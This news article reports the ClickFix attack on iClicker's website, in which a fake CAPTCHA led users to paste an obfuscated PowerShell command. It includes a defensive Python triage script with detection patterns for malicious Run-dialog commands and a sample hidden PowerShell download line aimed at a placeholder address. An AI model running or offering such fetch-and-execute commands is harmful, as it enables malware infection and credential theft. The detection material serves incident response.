
iClicker Website Compromised in Malware Attack Using Fake CAPTCHA

The website of iClicker, a widely used digital classroom engagement platform, was compromised in a ClickFix attack that used a fake CAPTCHA to trick users, primarily students and instructors, into executing a malicious PowerShell command on their devices.

May 12, 2025

Bisma Farrukh

iClicker, a subsidiary of Macmillan, is used by over 5,000 instructors and 7 million students at colleges across the U.S., including institutions like the University of Michigan and the University of Florida. The platform allows instructors to take attendance, conduct polls, and track student participation.

According to a security alert from the University of Michigan’s Safe Computing team, the attack occurred between April 12 and April 16, 2025. During this time, the iClicker homepage displayed a fake CAPTCHA prompt. Users were instructed to click “I’m not a robot” to proceed, but this was part of a deceptive social engineering tactic called ClickFix.

How the Attack Worked

When a user clicked the CAPTCHA, a malicious PowerShell command was silently copied to their Windows clipboard. The CAPTCHA prompted users to open the Windows Run dialog (Win + R), paste the command (Ctrl + V), and execute it, believing it was a verification step.

This PowerShell command, though heavily obfuscated, connected to a remote server (http://67.217.228[.]14:8080) to fetch another script. The payload delivered varied based on the visitor:

  • Targeted users received a script that installed malware capable of giving attackers complete control over the infected device.
  • Non-targets, such as security sandboxes, received a benign file like the Microsoft Visual C++ Redistributable, masking the true intent of the attack.
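Commands launched from the Run dialog are recorded per user in the registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, so responders can check whether a visitor actually pasted and ran the command. The following triage sketch is an added example, not code from iClicker or the University of Michigan alert. The dictionary export format, the heuristic rules and the sample entries are assumptions made for illustration.

```python
import re

PAGE_IOC = "67.217.228.14"  # server reported in the article (defanged there)

# Heuristics assumed for this example; tune them for your environment.
RULES = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"(?<!\w)-w\w*\s+(h\w*|1)\b", re.I),
    "encoded_command": re.compile(r"(?<!\w)-e\w*\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(r"https?://|\b(iwr|irm|invoke-webrequest|downloadstring)\b", re.I),
    "verification_lure": re.compile(r"not a robot|captcha", re.I),
}

def triage_runmru(values):
    """Return flagged Run-dialog entries, most recent first.

    `values` maps RunMRU value names to data: letters hold commands that end
    in '\\1', and 'MRUList' holds the letters ordered newest to oldest.
    """
    findings = []
    for name in values.get("MRUList", ""):
        command = values.get(name, "").removesuffix("\\1")
        hits = [rule for rule, rx in RULES.items() if rx.search(command)]
        if PAGE_IOC in command:
            hits.append("page_ioc")
        # A script host alone is normal admin use; require a second signal.
        suspicious = "page_ioc" in hits or ("script_host" in hits and len(hits) >= 2)
        if suspicious:
            findings.append({"value": name, "command": command, "signals": hits})
    return findings

# Constructed sample export (not data from the incident); 192.0.2.10 is a
# documentation-only address.
SAMPLE = {
    "MRUList": "cab",
    "a": "cmd\\1",
    "b": "notepad C:\\Users\\student\\notes.txt\\1",
    "c": 'powershell -w hidden -c "iwr http://192.0.2.10:8080/v" # I am not a robot\\1',
}

if __name__ == "__main__":
    for finding in triage_runmru(SAMPLE):
        print(finding["value"], finding["signals"], finding["command"])
```

A flagged entry only shows that the command was run from the Run dialog; it says nothing about which payload the server returned to that device.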

The exact nature of the malware isn’t fully confirmed, but based on similar ClickFix campaigns, it likely included information-stealing malware capable of harvesting:

  • Browser cookies and saved passwords
  • Credit card and autofill data
  • Cryptocurrency wallet files (e.g., wallet.txt, seed.txt, metamask.txt)
  • Documents containing sensitive information

Stolen data would then be packaged and exfiltrated to attackers, potentially to be resold or used in broader attacks such as ransomware deployment or breaches of educational networks.

Institutional Response and Concealed Disclosure

The attack has since been neutralized, but Macmillan did not respond to media inquiries regarding the incident. iClicker quietly published a security bulletin on May 6, which included a <meta name='robots' content='noindex, nofollow' /> tag, preventing it from appearing in search engine results and making it less accessible to the public.
